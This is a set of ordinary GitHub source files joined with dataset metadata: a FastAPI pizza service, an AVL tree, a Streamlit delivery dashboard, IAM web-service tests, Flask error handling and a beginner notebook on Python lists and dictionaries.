relocation program did not produce an expected\n output file.\"\"\"\nclass UnexpectedColdStart(RelocationError):\n \"\"\"!Raised when the relocation could not find the prior cycle's 6hr\n forecast, but it expected to be able to.\"\"\"\nclass StormRadiusError(RelocationError):\n \"\"\"!Raised when the merge cannot find the storm_radius file in the\n relocate or fix directory.\"\"\"\nclass NoSuchDomain(RelocationError):\n \"\"\"!Raised by hafs.input when trying to get the wrong domain from\n its hafs.relocate.Relocate child objects.\"\"\"\nclass EnsdaTrackerMissing(RelocationError):\n \"\"\"Raised when the relocation could not find the prior cycle's\n ensemble forecast track, but it expected to be able to.\"\"\"\n","repo_name":"hafs-community/HAFS","sub_path":"ush/hafs/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":15839,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"18170251575","text":"from datetime import datetime\nfrom fastapi import status\n\nfrom src.core.interfaces.services.pizzas.interface import IPizzaService\nfrom src.domain.models.responses.base.model import BaseResponse\nfrom src.domain.models.responses.orders.model import OrdersResponse\nfrom src.repositories.pizzas.repository import PizzasRepository\n\n\nclass PizzaService(IPizzaService):\n @classmethod\n async def create_pizza(cls, payload: dict, pizza_repo=PizzasRepository):\n data = payload.get(\"payload\")\n pizza_name = data.get(\"name\")\n query = {\"name\": pizza_name}\n projection = {\"_id\": False}\n\n price = data.get(\"price\")\n if price <= 0:\n return {\n \"status_code\": status.HTTP_400_BAD_REQUEST,\n \"message\": f\"Price invalid: {price}. 
Price must be greater than zero\",\n }\n\n pizza_data = await pizza_repo.find_one(query, projection)\n\n if pizza_data:\n return {\n \"status_code\": status.HTTP_200_OK,\n \"message\": \"Pizza already exist!. Try another pizza\",\n }\n\n data.update({\"created_at\": datetime.now().isoformat()})\n await pizza_repo.insert_one(data)\n return {\"status_code\": status.HTTP_201_CREATED, \"message\": \"Pizza created!\"}\n\n @classmethod\n async def find_all_pizzas(cls, payload: dict, pizza_repo=PizzasRepository):\n projection = {\"_id\": False}\n limit = int(payload.get(\"size\"))\n page = int(payload.get(\"page\"))\n\n skip = pizza_repo.calculate_skip(limit, page)\n\n result, total_items = await pizza_repo.find_all_paginated(\n {}, skip, limit, projection\n )\n total_pages = pizza_repo.calculate_pages(total_items, limit)\n\n response = OrdersResponse(\n result=result,\n total_pages=total_pages,\n status_code=status.HTTP_302_FOUND,\n message=\"\",\n ).__dict__\n return response\n\n @classmethod\n async def find_one_pizza(cls, payload: dict, pizza_repo=PizzasRepository):\n projection = {\"_id\": False}\n pizza_name = payload.get(\"pizza_name\")\n query = {\"name\": {\"$regex\": pizza_name, \"$options\": \"i\"}}\n\n result = await pizza_repo.find_one(query, projection)\n if not result:\n return BaseResponse(\n result=[],\n status_code=status.HTTP_404_NOT_FOUND,\n message=\"Pizza not found\",\n ).__dict__\n\n response = BaseResponse(\n result=result, status_code=status.HTTP_302_FOUND, message=\"Pizza Found\"\n ).__dict__\n return response\n\n @classmethod\n async def update_pizza(cls, payload: dict, pizza_repo=PizzasRepository):\n pizza_name = payload.get(\"pizza_name\")\n query = {\"name\": pizza_name}\n projection = {\"_id\": False}\n new_data = payload.get(\"data\")\n new_data.update({\"updated_at\": datetime.now().isoformat()})\n\n price = new_data.get(\"price\")\n if price <= 0:\n return {\n \"status_code\": status.HTTP_400_BAD_REQUEST,\n \"message\": f\"Price invalid: {price}. 
Price must be greater than zero\",\n }\n\n result = await pizza_repo.find_one(query, projection)\n if not result:\n return BaseResponse(\n result=[],\n status_code=status.HTTP_404_NOT_FOUND,\n message=\"Pizza not found\",\n ).__dict__\n\n await pizza_repo.update_one(query, new_data)\n response = BaseResponse(\n result=[], status_code=status.HTTP_200_OK, message=\"Pizza updated\"\n ).__dict__\n return response\n\n @classmethod\n async def delete_pizza(cls, payload: dict, pizza_repo=PizzasRepository):\n pizza_name = payload.get(\"pizza_name\")\n query = {\"name\": pizza_name}\n projection = {\"_id\": False}\n\n result = await pizza_repo.find_one(query, projection)\n if not result:\n return BaseResponse(\n result=[],\n status_code=status.HTTP_404_NOT_FOUND,\n message=\"Pizza not found\",\n ).__dict__\n\n await pizza_repo.delete_one(query)\n response = BaseResponse(\n result=[], status_code=status.HTTP_200_OK, message=\"Pizza updated\"\n ).__dict__\n return response\n","repo_name":"SMarkus27/pizzas-api-python","sub_path":"src/services/pizzas/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72811285228","text":"import numpy as np\n\nfrom src.services.dto.bounding_box import BoundingBoxDTO\nfrom src.services.facescan.imgscaler.imgscaler import ImgScaler\n\n\ndef test__given_downscaled_image__when_upscaling_box__then_returns_upscaled_box():\n img = np.zeros((200, 200, 3))\n scaler = ImgScaler(img_length_limit=100)\n scaler.downscale_img(img)\n\n output_box = BoundingBoxDTO(10, 10, 20, 20, 1).scaled(scaler.upscale_coefficient)\n\n assert output_box == BoundingBoxDTO(20, 20, 40, 40, 1)\n\n\ndef test__given_not_downscaled_image__when_upscaling_box__then_returns_same_box():\n img = np.zeros((20, 20, 3))\n scaler = ImgScaler(img_length_limit=100)\n scaler.downscale_img(img)\n\n output_box = BoundingBoxDTO(10, 10, 20, 20, 1).scaled(scaler.upscale_coefficient)\n\n assert output_box == BoundingBoxDTO(10, 10, 20, 20, 1)\n","repo_name":"exadel-inc/CompreFace","sub_path":"embedding-calculator/src/services/facescan/imgscaler/test/test_upscale_box.py","file_name":"test_upscale_box.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":3424,"dataset":"github-code","pt":"37"} +{"seq_id":"38851060258","text":"import pandas as pd\r\nimport numpy as np\r\nimport statistics\r\nimport plotly.express as px\r\nfrom haversine import haversine\r\nimport streamlit as st\r\nfrom PIL import Image\r\nimport folium\r\nfrom streamlit_folium import folium_static\r\nimport datetime\r\nimport plotly.graph_objects as go\r\n\r\nst.set_page_config( page_title='Visão Restaurantes', page_icon='🍽️', layout='wide' )\r\n\r\ndf_raw = pd.read_csv('train.csv')\r\ndf = df_raw.copy()\r\n\r\n# Remover spaco da string\r\ndf['ID'] = df['ID'].str.strip()\r\ndf['Delivery_person_ID'] = df['Delivery_person_ID'].str.strip()\r\n\r\n# Excluir as linhas com a idade dos entregadores vazia\r\n# ( Conceitos de seleção condicional )\r\nlinhas_vazias = df['Delivery_person_Age'] != 'NaN '\r\ndf = df.loc[linhas_vazias, :]\r\n\r\n# Conversao de texto/categoria/string para numeros inteiros\r\ndf['Delivery_person_Age'] = df['Delivery_person_Age'].astype( int )\r\n\r\n# Conversao de texto/categoria/strings para numeros decimais\r\ndf['Delivery_person_Ratings'] = df['Delivery_person_Ratings'].astype( float )\r\n\r\n# Conversao de texto para data\r\ndf['Order_Date'] = 
pd.to_datetime( df['Order_Date'], format='%d-%m-%Y' )\r\n\r\n# Remove the rows of the multiple_deliveries column whose \r\n# content equals 'NaN '\r\nlinhas_vazias = df['multiple_deliveries'] != 'NaN '\r\ndf = df.loc[linhas_vazias, :]\r\ndf['multiple_deliveries'] = df['multiple_deliveries'].astype( int )\r\n\r\n# Reset the index after dropping rows\r\ndf = df.reset_index( drop=True )\r\n\r\n# 6. Removing the spaces inside strings/text/object columns\r\n\r\ndf.loc[:, 'ID'] = df.loc[:, 'ID'].str.strip()\r\ndf.loc[:, 'Road_traffic_density'] = df.loc[:, 'Road_traffic_density'].str.strip()\r\ndf.loc[:, 'Type_of_order'] = df.loc[:, 'Type_of_order'].str.strip()\r\ndf.loc[:, 'Type_of_vehicle'] = df.loc[:, 'Type_of_vehicle'].str.strip()\r\ndf.loc[:, 'City'] = df.loc[:, 'City'].str.strip()\r\ndf.loc[:, 'Festival'] = df.loc[:, 'Festival'].str.strip()\r\n\r\n\r\n#Extracting the numeric part of the Time_taken(min) column\r\ndf['Time_taken(min)'] = df['Time_taken(min)'].apply(lambda x: x.split( '(min) ')[1])\r\ndf['Time_taken(min)'] = df['Time_taken(min)'].str.replace('(', '').str.replace(')', '')\r\ndf['Time_taken(min)'] = df['Time_taken(min)'].astype( int )\r\n\r\n\r\n# Stripping the spaces from the Festival column\r\ndf['Festival'] = df['Festival'].str.strip()\r\n\r\npedidos_dia = df.loc[:,['ID','Order_Date']].groupby( 'Order_Date' ).count().reset_index()\r\npx.bar( pedidos_dia, x = 'Order_Date', y = 'ID')\r\n#=====================\r\n#streamlit\r\nst.header('Marketplace Visão Restaurantes')\r\n\r\n\r\n#=====================\r\n#Sidebar\r\n#=====================\r\n\r\nimage = Image.open('logo.jpg')\r\nst.sidebar.image(image,width=40)\r\nst.sidebar.markdown('# Curry Company')\r\nst.sidebar.markdown('## Best delivery in Town')\r\n\r\nst.sidebar.markdown(' ## Selecione uma data para visualizar')\r\ndate_slider = st.sidebar.slider('Até qual valor?',\r\n value = datetime.datetime(2022, 3, 13),\r\n min_value = datetime.datetime(2022, 2, 11 ),\r\n max_value = datetime.datetime(2022, 4, 6),\r\n format = 'DD-MM-YYYY')\r\nst.header(date_slider)\r\nst.sidebar.markdown('''---''')\r\ntraffic_options = st.sidebar.multiselect(\r\n 'Quais as condições de trânsito?',\r\n ('Baixo', 'Médio','Alto','Congestionamento'))\r\nst.sidebar.markdown('''---''')\r\n\r\n\r\n#=====================\r\n# Layout\r\n#=====================\r\n\r\ntab1, tab2, tab3 = st.tabs(['Visão Cliente', 'Visão Gerencial', 'Visão Geográfica'])\r\n\r\nwith tab1:\r\n \r\n with st.container():\r\n st.markdown('## Metrics')\r\n col1, col2 = st.columns (2)\r\n with col1:\r\n aux = df.loc[0:10, ['Restaurant_latitude', 'Restaurant_longitude','Delivery_location_latitude', 'Delivery_location_longitude']].apply(lambda x: haversine((x['Restaurant_latitude'], x['Restaurant_longitude']), (x['Delivery_location_latitude'], x['Delivery_location_longitude'])),axis = 1)\r\n aux = round(aux.mean(), 2)\r\n col1.metric('Distância média',aux)\r\n \r\n \r\n entregadores = df['Delivery_person_ID'].nunique()\r\n col1.metric('Entregadores ',entregadores)\r\n \r\n with col2:\r\n aux = round(df.loc[df['Festival'] =='No','Time_taken(min)'].mean(), 2)\r\n col2.metric('Média de tempo sem Festival',aux)\r\n \r\n aux2 = round(df.loc[df['Festival'] =='Yes','Time_taken(min)'].mean(), 2)\r\n col2.metric('Média de tempo com Festival',aux2)\r\n \r\n \r\n with st.container():\r\n st.markdown('## Time Taken Mean') \r\n aux = df.groupby('City').agg({'Time_taken(min)': ['mean', 'std']}).reset_index()\r\n aux.columns = ['City', 'Mean', 'Std']\r\n fig = px.pie(aux, 
values='Mean', names='City')\r\n st.plotly_chart(fig, use_container_width=True)\r\n \r\nwith st.container():\r\n st.markdown( \"\"\"---\"\"\" )\r\n st.title( \"Distribuição do Tempo\" )\r\n \r\n df_aux = df.loc[:, ['City', 'Time_taken(min)']].groupby( 'City' ).agg( {'Time_taken(min)': ['mean', 'std']} )\r\n df_aux.columns = ['avg_time', 'std_time']\r\n df_aux = df_aux.reset_index()\r\n\r\n fig = go.Figure() \r\n fig.add_trace( go.Bar( name='Control', x=df_aux['City'], y=df_aux['avg_time'], error_y=dict(type='data', array=df_aux['std_time']))) \r\n fig.update_layout(barmode='group') \r\n\r\n st.plotly_chart( fig )\r\n \r\n \r\n\r\n \r\nwith st.container():\r\n st.markdown( \"\"\"---\"\"\" )\r\n \r\n \r\n #col1, col_extra, col2 = st.columns( 3, gap =\"large\" )\r\n with col1:\r\n cols = ['Delivery_location_latitude', 'Delivery_location_longitude', 'Restaurant_latitude', 'Restaurant_longitude']\r\n df['distance'] = df.loc[:, cols].apply( lambda x: \r\n haversine( (x['Restaurant_latitude'], x['Restaurant_longitude']), \r\n (x['Delivery_location_latitude'], x['Delivery_location_longitude']) ), axis=1 )\r\n\r\n avg_distance = df.loc[:, ['City', 'distance']].groupby( 'City' ).mean().reset_index()\r\n fig = go.Figure( data=[ go.Pie( labels=avg_distance['City'], values=avg_distance['distance'], pull=[0, 0.1, 0])])\r\n st.plotly_chart( fig )\r\n\r\n \r\n with col2:\r\n df_aux = ( df.loc[:, ['City', 'Time_taken(min)', 'Road_traffic_density']]\r\n .groupby( ['City', 'Road_traffic_density'] )\r\n .agg( {'Time_taken(min)': ['mean', 'std']} ) )\r\n\r\n df_aux.columns = ['avg_time', 'std_time']\r\n df_aux = df_aux.reset_index()\r\n\r\n fig = px.sunburst(df_aux, path=['City', 'Road_traffic_density'], values='avg_time',\r\n color='std_time', color_continuous_scale='RdBu',\r\n color_continuous_midpoint=np.average(df_aux['std_time'] ) )\r\n st.plotly_chart( fig )\r\n \r\n \r\n","repo_name":"karolmetzker/curry_company","sub_path":"pages/visao_restaurante.py","file_name":"visao_restaurante.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27882450851","text":"import traceback\n\nfrom flask import jsonify\n\nfrom dataactcore.config import CONFIG_SERVICES\n\n\ndef add_exception_handlers(app):\n @app.errorhandler(422)\n def handle_invalid_usage(error):\n \"\"\"We receive 422s from the webargs library. 
Clean up their message\n and convert them to 400s\"\"\"\n if hasattr(error, 'data'):\n message = ' '.join(\n field_name + ': ' + '; '.join(messages)\n for field_name, messages\n in sorted(error.data['messages'].items())\n )\n else:\n message = 'Invalid request'\n body = {'message': message}\n if CONFIG_SERVICES['debug']:\n body['exception_type'] = str(error.exc)\n body['trace'] = [\n str(entry)\n for entry in traceback.extract_tb(error.exc.__traceback__, 10)\n ]\n return jsonify({'message': message}), 400\n","repo_name":"fedspendingtransparency/data-act-broker-backend","sub_path":"dataactbroker/exception_handler.py","file_name":"exception_handler.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"7065328927","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport requests\nimport hashlib\nfrom WsTestCase import WsTestCase\n\n\nclass IamTestCase(WsTestCase):\n ref_user = {\n 'login': 'john.doe',\n 'password_hash': '1234',\n 'last_name': 'Doe',\n 'first_name': 'John',\n 'role': 'user',\n 'entity_id': 'bab2ab808f1a11e3baa80800200c9a66'\n }\n\n def test_create_user_twice(self):\n \"\"\"Try to create the same user twice, the first works and we assert failure on the second trial.\"\"\"\n rv_post = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_post, 201)\n json_post = rv_post.json()\n\n # check returned user's fields\n for field in ('login', 'last_name', 'first_name', 'role', 'entity_id'):\n self.assertIn(field, json_post, 'missing field ' + field)\n self.assertEquals(json_post[field], self.ref_user[field], 'mismatch on field ' + field)\n\n user_id = json_post['id']\n\n rv_get = self.get(self.iam_endpoint + '/v1/users/' + user_id)\n self.assertJsonAndStatus(rv_get, 200)\n\n rv_post_2 = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_post_2, 412)\n\n def test_edit_user(self):\n \"\"\"Create and modify a user.\"\"\"\n rv_post = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n user_id = rv_post.json()['id']\n\n put_data = {\n 'login': 'jack.foo',\n 'last_name': 'Foo',\n 'first_name': 'Jack',\n 'role': 'manager'\n }\n\n # Edit the user\n rv_put = self.put_json(self.iam_endpoint + '/v1/users/' + user_id,\n put_data,\n self.session)\n self.assertJsonAndStatus(rv_put, 200)\n json_put = rv_put.json()\n\n # Get it\n rv_get = self.get(self.iam_endpoint + '/v1/users/' + user_id)\n self.assertJsonAndStatus(rv_get, 200)\n json_get = rv_get.json()\n\n # Assert the concerned fields are modified in both the PUT and GET responses\n for field in ('login', 'last_name', 'first_name', 'role'):\n self.assertIn(field, json_put, 'missing field ' + field + ' in PUT response')\n self.assertIn(field, json_get, 'missing field ' + field + ' in GET response')\n self.assertEquals(json_put[field], put_data[field],\n 'mismatch on field ' + field + ' in PUT response')\n self.assertEquals(json_get[field], put_data[field],\n 'mismatch on field ' + field + ' in GET response')\n\n def test_delete_recreate_user(self):\n \"\"\"Create and delete a user, assert that the user no longer exists, and can be created\n again.\"\"\"\n rv_create = self.post_json(self.iam_endpoint + '/v1/users',\n self.ref_user,\n self.session)\n self.assertJsonAndStatus(rv_create, 201)\n user_id = rv_create.json()['id']\n\n rv_delete = self.delete(self.iam_endpoint + '/v1/users/' + user_id)\n 
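The helpers post_json, put_json, get, delete and assertJsonAndStatus used throughout these tests come from WsTestCase, which is not shown here. A minimal sketch of what two of them could look like, assuming a shared requests.Session; the names and signatures are assumptions, not the repository's code:

import requests

def post_json(url, payload, session):
    # Send the payload as a JSON body over the shared requests.Session.
    return session.post(url, json=payload)

def assert_json_and_status(test_case, response, expected_status):
    # A response passes when it carries the expected status code and a JSON body.
    test_case.assertEqual(expected_status, response.status_code)
    test_case.assertIn('application/json', response.headers.get('Content-Type', ''))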
self.assertJsonAndStatus(rv_delete, 200)\n\n        rv_get = self.get(self.iam_endpoint + '/v1/users/' + user_id)\n        self.assertEquals(rv_get.status_code, 404)\n\n        rv_recreate = self.post_json(self.iam_endpoint + '/v1/users',\n                                     self.ref_user,\n                                     self.session)\n        self.assertJsonAndStatus(rv_recreate, 201)\n\n    def test_create_login_permission_logout(self):\n        \"\"\"Create a user, login, test permissions, and logout.\"\"\"\n        rv_create = self.post_json(self.iam_endpoint + '/v1/users',\n                                   self.ref_user,\n                                   self.session)\n        self.assertJsonAndStatus(rv_create, 201)\n        user_id = rv_create.json()['id']\n\n        # Log in with a bad password\n        rv_login_failed = self.post_json(\n            self.iam_endpoint + '/v1/login',\n            {'login': self.ref_user['login'],\n             'password_hash': hashlib.sha1('qwerty').hexdigest()},\n            self.session)\n        self.assertEquals(rv_login_failed.status_code, 404)\n\n        # Log in\n        rv_login = self.post_json(\n            self.iam_endpoint + '/v1/login',\n            {'login': self.ref_user['login'],\n             'password_hash': hashlib.sha1(self.ref_user['password_hash']).hexdigest()},\n            self.session)\n        self.assertJsonAndStatus(rv_login, 200)\n        session_id = rv_login.json()['session_id']\n\n        # Check a granted permission\n        rv_permission_1 = self.get(\n            self.iam_endpoint + '/v1/sessions/{}/{}/permission/{}/{}'.format(\n                user_id, session_id, 'read', 'own_transaction'\n            ))\n        self.assertJsonAndStatus(rv_permission_1, 200)\n        self.assertTrue(rv_permission_1.json()['allowed'])\n\n        # Check a denied permission\n        rv_permission_2 = self.get(\n            self.iam_endpoint + '/v1/sessions/{}/{}/permission/{}/{}'.format(\n                user_id, session_id, 'read', 'transaction'\n            ))\n        self.assertJsonAndStatus(rv_permission_2, 200)\n        self.assertFalse(rv_permission_2.json()['allowed'])\n\n        # Check a non-existing permission\n        rv_permission_3 = self.get(\n            self.iam_endpoint + '/v1/sessions/{}/{}/permission/{}/{}'.format(\n                user_id, session_id, 'dummy', 'dummy'\n            ))\n        self.assertEquals(404, rv_permission_3.status_code)\n\n        # Log out\n        rv_logout = self.post_json(self.iam_endpoint + '/v1/sessions/' + session_id + '/logout',\n                                   self.session)\n        self.assertEquals(200, rv_logout.status_code)\n\n        # Check that the session no longer exists\n        rv_session = self.get(self.iam_endpoint + '/v1/sessions/' + session_id)\n        self.assertEquals(404, rv_session.status_code)\n\n    def test_search(self):\n        \"\"\" Create an entity with a user in it, search the user twice:\n        * first, find him\n        * second, don't find him\n        \"\"\"\n        # Create\n        rv_create = self.post_json(self.iam_endpoint + '/v1/users',\n                                   self.ref_user,\n                                   self.session)\n        self.assertJsonAndStatus(rv_create, 201)\n        user_id = rv_create.json()['id']\n\n        # Find him\n        rv_search_find = self.get(self.iam_endpoint + '/v1/users?login=john.doe')\n        users = rv_search_find.json()['users']\n        self.assertEquals(1, len(users))\n        self.assertEquals(user_id, users[0]['id'])\n\n        # Doesn't find him\n        rv_search_not_found = self.get(self.iam_endpoint + '/v1/users?first_name=alex')\n        no_user = rv_search_not_found.json()['users']\n        self.assertEquals(0, len(no_user))\n\n    def test_put_delete_entity(self):\n        \"\"\"\n        Create an entity, PUT it, add a user, delete the entity and check that the user is deleted.\n        \"\"\"\n\n        # Edit the entity, then get it and assert the name was modified\n        entity_id = self.ref_user['entity_id']\n        rv_put = self.put_json(self.iam_endpoint + '/v1/entities/' + entity_id,\n                               {'name': 'Centrale-Supelec'},\n                               self.session)\n        self.assertJsonAndStatus(rv_put, 200)\n\n        rv_get_entity = self.get(self.iam_endpoint + '/v1/entities/' + entity_id)\n        self.assertJsonAndStatus(rv_get_entity, 
200)\n        self.assertEquals('Centrale-Supelec', rv_get_entity.json()['name'])\n\n        # Add a user\n        rv_create = self.post_json(self.iam_endpoint + '/v1/users',\n                                   self.ref_user,\n                                   self.session)\n        self.assertJsonAndStatus(rv_create, 201)\n        user_id = rv_create.json()['id']\n\n        # Delete the entity and assert the user no longer exists\n        rv_delete = self.delete(self.iam_endpoint + '/v1/entities/' + entity_id)\n        self.assertEquals(200, rv_delete.status_code)\n\n        rv_get_user = self.get(self.iam_endpoint + '/v1/users/' + user_id)\n        self.assertEquals(404, rv_get_user.status_code)\n","repo_name":"PageLib/ws","sub_path":"test/test_iam.py","file_name":"test_iam.py","file_ext":"py","file_size_in_byte":8438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3662559622","text":"from binarytree import Node\nfrom timeit import timeit\nimport sys\n\nsys.setrecursionlimit(20000)  # raises the recursion limit so big trees don't\n# have a problem with recursion in Python\n\n\nclass AvlTree:\n    def __init__(self, num_list):\n        self.__root = Node(num_list[0])\n        for num in num_list[1:]:\n            self.AVLinsert(num)\n\n    def rebalance(self, balance, key, node):\n        \"\"\"\n        performs a rebalance if needed\n        args:\n            balance - int with current balance\n            key - current key\n            node - node to rebalance\n        returns:\n            node - new or old node\n        \"\"\"\n        if balance > 1:\n            if key < node.left.value:\n                return self.rightRotate(node)\n            if key > node.left.value:\n                node.left = self.leftRotate(node.left)\n                return self.rightRotate(node)\n        if balance < -1:\n            if key > node.right.value:\n                return self.leftRotate(node)\n            if key < node.right.value:\n                node.right = self.rightRotate(node.right)\n                return self.leftRotate(node)\n\n        return node\n\n    def leftRotate(self, node):\n        \"\"\"\n        left rotation\n        args:\n            node - node to perform rotation on\n        returns:\n            node - new node after rotation\n        \"\"\"\n        new_node = node.right\n        templ = new_node.left\n\n        new_node.left = node\n        node.right = templ\n\n        node.height = 1 + max(self.get_height(node.left),\n                              self.get_height(node.right))\n        new_node.height = 1 + max(self.get_height(new_node.left),\n                                  self.get_height(new_node.right))\n        # Return the new node\n        return new_node\n\n    def rightRotate(self, node):\n        \"\"\"\n        right rotation\n        args:\n            node - node to perform rotation on\n        returns:\n            node - new node after rotation\n        \"\"\"\n        new_node = node.left\n        tempr = new_node.right\n\n        new_node.right = node\n        node.left = tempr\n\n        node.height = 1 + max(self.get_height(node.left),\n                              self.get_height(node.right))\n        new_node.height = 1 + max(self.get_height(new_node.left),\n                                  self.get_height(new_node.right))\n\n        # Return the new node\n        return new_node\n\n    def _AVLinsert(self, node, key):\n        \"\"\"\n        Insert method - inserts node into tree; if key is a duplicate\n        increases the counter, insertion rules as AVL, performs rebalance\n        if needed\n        Args:\n            value - value to insert\n            node - node to start insert from\n        returns:\n            node - new node as node given\n        \"\"\"\n        if key == node.value:\n            node.counter = getattr(node, 'counter', 1) + 1\n            return node\n        elif key < node.value:\n            if node.left is None:\n                node.left = Node(key)\n            else:\n                node.left = self._AVLinsert(node.left, key)\n        else:\n            if node.right is None:\n                node.right = Node(key)\n            else:\n                node.right = self._AVLinsert(node.right, key)\n\n        node.height = 1 + max(self.get_height(node.left),\n                              self.get_height(node.right))\n\n        balance = self.get_balance(node)\n\n        node = self.rebalance(balance, key, node)\n        return node\n\n    def AVLinsert(self, key):\n        \"\"\"\n        insert method - uses the private 
insert and changes root if needed\n        Args:\n            key - key to insert\n        Returns:\n            nothing\n        \"\"\"\n        self.__root = self._AVLinsert(self.__root, key)\n\n    def pre_order_list(self):\n        \"\"\"\n        pre order traversal - node, left, right\n        Args:\n            node - node to start traversal from\n        returns:\n            list - list with values from tree\n        \"\"\"\n        return self.__root.pre_order_list(self.__root)\n\n    def in_order_list(self):\n        \"\"\"\n        in order traversal - left, node, right\n        Args:\n            node - node to start traversal from\n        returns:\n            list - list with values from tree\n        \"\"\"\n        return self.__root.in_order_list(self.__root)\n\n    def get_root(self):\n        return self.__root\n\n    def get_height(self, node):\n        if node is None:\n            return 0\n        return node.height\n\n    def get_balance(self, node):\n        \"\"\"\n        returns the balance - the difference between the left height and the right height\n        args:\n            node - node to get balance from\n        returns:\n            balance - int\n        \"\"\"\n        if node is None:\n            return 0\n        return self.get_height(node.left) - self.get_height(node.right)\n\n    def search(self, key):\n        \"\"\"\n        Search method - uses the root node's search function\n        Args:\n            key - value to find\n        returns:\n            node with that value\n        \"\"\"\n        return self.__root.search(key)\n\n\ndef avltree_creation_time(numbers):\n    setupcode = '''\nfrom avltree import AvlTree\n    '''\n    MYSTML = f'AvlTree({numbers})'\n    return timeit(setup=setupcode, stmt=MYSTML, number=100)\n\n\ndef avltree_search_time(numbers):\n    times = []\n    setupcode = f'from avltree import AvlTree\\navl = AvlTree({numbers})'\n    for i in range(1, 10000):\n        MYSTML = f'avl.search({numbers[i]})'\n        times.append(timeit(setup=setupcode, stmt=MYSTML, number=10))\n    return times\n","repo_name":"noFrostoo/aisdi-pw","sub_path":"Trees/avltree.py","file_name":"avltree.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72735610348","text":"\"\"\"Integration tests for ``cockpit.quantities``.\"\"\"\n\nimport pytest\n\nfrom cockpit import quantities\nfrom cockpit.quantities import __all__\nfrom cockpit.quantities.quantity import SingleStepQuantity, TwoStepQuantity\nfrom cockpit.utils.schedules import linear\nfrom tests.test_quantities.settings import PROBLEMS, PROBLEMS_IDS\nfrom tests.utils.harness import SimpleTestHarness\nfrom tests.utils.problem import instantiate\n\nQUANTITIES = [\n    getattr(quantities, q)\n    for q in __all__\n    if q != \"Quantity\"\n    and q != \"SingleStepQuantity\"\n    and q != \"TwoStepQuantity\"\n    and q != \"ByproductQuantity\"\n]\nIDS = [q_cls.__name__ for q_cls in QUANTITIES]\n\n\n@pytest.mark.parametrize(\"problem\", PROBLEMS, ids=PROBLEMS_IDS)\n@pytest.mark.parametrize(\"quantity_cls\", QUANTITIES, ids=IDS)\ndef test_quantity_integration_and_track_events(problem, quantity_cls):\n    \"\"\"Check if ``Cockpit`` with a single quantity works.\n\n    Args:\n        problem (tests.utils.Problem): Settings for train loop.\n        quantity_cls (Class): Quantity class that should be tested.\n    \"\"\"\n    interval, offset = 1, 2\n    schedule = linear(interval, offset=offset)\n    quantity = quantity_cls(track_schedule=schedule, verbose=True)\n\n    with instantiate(problem):\n        iterations = problem.iterations\n        testing_harness = SimpleTestHarness(problem)\n        cockpit_kwargs = {\"quantities\": [quantity]}\n        testing_harness.test(cockpit_kwargs)\n\n    def is_track_event(iteration):\n        if isinstance(quantity, SingleStepQuantity):\n            return schedule(iteration)\n        elif isinstance(quantity, TwoStepQuantity):\n            end_iter = quantity.SAVE_SHIFT + iteration\n            return 
quantity.is_end(end_iter) and end_iter < iterations\n else:\n raise ValueError(f\"Unknown quantity: {quantity}\")\n\n track_events = sorted(i for i in range(iterations) if is_track_event(i))\n output_events = sorted(quantity.get_output().keys())\n\n assert output_events == track_events\n","repo_name":"f-dangel/cockpit","sub_path":"tests/test_quantities/test_quantity_integration.py","file_name":"test_quantity_integration.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":453,"dataset":"github-code","pt":"37"} +{"seq_id":"7396137051","text":"a = []\n\ntype(a)\n\n\n# In[2]:\n\n\nhelp(a)\n\n\n# In[2]:\n\n\n# mutable means it is editable\n\na = [1,2,3]\n\na.append(4)\n\nprint(a)\n\n\n# In[3]:\n\n\n# accessing list elements\n\na[0]\n\n\n# In[4]:\n\n\na[3]\n\n\n# In[5]:\n\n\na[-1]\n\n\n# In[7]:\n\n\nprint(len(a))\na[4]\n\n\n# In[9]:\n\n\n# extract sublist\n\na[2:3] # last element is not included\n\n\n# In[10]:\n\n\na[1:]\n\n\n# In[13]:\n\n\na[:2]\n\n\n# In[14]:\n\n\na[:] # copy of list\n\n\n# In[4]:\n\n\na.clear()\n\na\n\n\n# In[5]:\n\n\na = [1,2,4,3]\n\na.sort()\n\na\n\n\n# In[10]:\n\n\nfor x in a:\n print(x+10)\n\n\n# In[6]:\n\n\n# list comprehensions are in-line lists\n\nb = [x+10 for x in a]\n\nb\n\n\n# In[16]:\n\n\nlist_of_names = ['Janet', 'Mike','Charlie','Henry', 'Jane']\n\n# String concatenation also works.\nlist_of_fullnames = [x+\" Doe\" for x in list_of_names]\n\nlist_of_fullnames\n\n\n# # dictionary\n\n# In[12]:\n\n\nd = {}\n\ntype(d)\n\n\n# In[13]:\n\n\nhelp(d)\n\n\n# In[26]:\n\n\n# There are two key ways to initialize a dictionary.\n\nx = {'one': 1, 'two': 2, 'three': 3}\nprint(x)\nx = dict(one=1,two=2,three=3)\nx\n\n\n# In[17]:\n\n\nx['one']\nx['two']\n\n\n# In[18]:\n\n\nx.get('one')\n\n\n# In[19]:\n\n\nx['four']\n\n\n# In[23]:\n\n\nfour = x.get('four')\ntype(four)\n\n\n# In[24]:\n\n\nif four is None:\n print(\"four is not in dictionary x\")\n\n\n# In[27]:\n\n\ndictionary = {'listitems': [1,2,3], 'string': \"hello!!\"}\n\n\n# In[29]:\n\n\nfor key, items in dictionary.items():\n print(key, items)\n\n\n# 